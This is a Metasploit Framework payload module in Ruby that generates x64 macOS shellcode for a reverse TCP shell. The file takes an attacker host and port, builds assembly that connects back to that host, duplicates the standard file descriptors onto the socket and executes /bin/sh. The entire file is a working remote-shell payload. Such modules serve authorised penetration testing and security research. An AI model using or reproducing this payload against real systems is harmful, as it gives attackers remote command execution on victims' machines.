modules/payloads/singles/osx/x64/shell_reverse_tcp.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
module MetasploitModule
CachedSize = 128
include Msf::Payload::Single
include Msf::Payload::Osx
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(
merge_info(
info,
'Name' => 'OS X x64 Shell Reverse TCP',
'Description' => 'Connect back to attacker and spawn a command shell',
'Author' => 'nemo <nemo[at]felinemenace.org>',
'License' => MSF_LICENSE,
'Platform' => 'osx',
'Arch' => ARCH_X64,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::CommandShellUnix
)
)
# exec payload options
register_options(
[
OptString.new('CMD', [ true, 'The command string to execute', '/bin/sh' ]),
Opt::LHOST,
Opt::LPORT(4444)
]
)
end
# build the shellcode payload dynamically based on the user-provided CMD
def generate(_opts = {})
lhost = datastore['LHOST'] || '127.0.0.1'
# OptAddress allows either an IP or hostname, we only want IPv4
unless Rex::Socket.is_ipv4?(lhost)
raise ArgumentError, 'LHOST must be in IPv4 format.'
end
cmd = (datastore['CMD'] || '') + "\x00"
encoded_port = [datastore['LPORT'].to_i, 2].pack('vn').unpack1('N')
encoded_host = Rex::Socket.addr_aton(lhost).unpack1('V')
encoded_host_port = format('0x%.8x%.8x', encoded_host, encoded_port)
shell_asm = %(
mov eax,0x2000061
push 0x2
pop rdi
push 0x1
pop rsi
xor rdx,rdx
syscall
mov r12,rax
mov rdi,rax
mov eax,0x2000062
xor rsi,rsi
push rsi
mov rsi, #{encoded_host_port}
push rsi
mov rsi,rsp
push 0x10
pop rdx
syscall
mov rdi,r12
mov eax,0x200005a
mov rsi,2
syscall
mov eax,0x200005a
mov rsi,1
syscall
mov eax,0x200005a
mov rsi,0
syscall
xor rax,rax
mov eax,0x200003b
call load_cmd
db "#{cmd}", 0x00
load_cmd:
pop rdi
xor rdx,rdx
push rdx
push rdi
mov rsi,rsp
syscall
)
Metasm::Shellcode.assemble(Metasm::X64.new, shell_asm).encode_string
end
end